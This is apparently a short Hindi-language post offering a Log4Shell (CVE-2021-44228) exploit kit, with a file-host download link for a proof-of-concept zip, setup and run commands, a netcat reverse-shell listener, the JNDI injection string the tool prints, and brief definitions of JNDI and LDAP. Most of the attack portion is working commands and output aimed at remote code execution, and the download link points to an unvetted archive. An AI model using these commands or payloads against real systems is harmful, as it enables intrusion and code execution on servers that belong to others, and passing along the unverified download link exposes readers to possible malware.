
CVE-2021-44228 (Log4Shell) के लिए शोषण उपकरण जो एक दुर्भावनापूर्ण LDAP सर्वर स्थापित करता है और कमजोर Log4j अनुप्रयोगों पर रिमोट कोड निष्पादन प्राप्त करने के लिए एक Java पेलोड वितरित करता है।
लॉग4शेल भेद्यता परीक्षण उपकरण https://log4shell.tools/
जावा के साथ ही शोषण शामिल है, खाता बनाने आदि से बचने के लिए..
http://www.mediafire.com/file/bs1spnysc6fbz1a/log4j-shell-poc_%25281%2529.zip/file
pip install -r requirements.txt
$ python3 poc.py --userip localhost --webport 8000 --lport 9001
nc -lvnp 9001
$ python3 poc.py --userip localhost --webport 8000 --lport 9001
[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc
[+] Exploit java class created success
[+] Setting up fake LDAP server
[+] Send me: ${jndi:ldap://localhost:1389/a}
Listening on 0.0.0.0:1389
log4j का मूल अवधारणा
JNDI क्या है
यह एक निर्देशिका सेवा के लिए एक जावा API है जो जावा सॉफ्टवेयर क्लाइंट को एक नाम के माध्यम से डेटा और संसाधनों की खोज और खोज करने की अनुमति देता है।
LDAP क्या है
यह एक निर्देशिका एक्सेस प्रोटोकॉल है। LDAP का उपयोग Docker, Jenkins, Kubernetes, Open VPN और Linux Samba सर्वरों के साथ उपयोगकर्ता नाम और पासवर्ड को मान्य करने के लिए किया जा सकता है। LDAP सिंगल साइन-ऑन का उपयोग सिस्टम प्रशासकों द्वारा LDAP डेटाबेस तक पहुंच को नियंत्रित करने के लिए भी किया जा सकता है।
जो कोई भी दोष के बारे में अधिक जानना चाहता है, उसके लिए नीचे दस्तावेज़ दिया गया है:
जावा के बिना शोषण शामिल है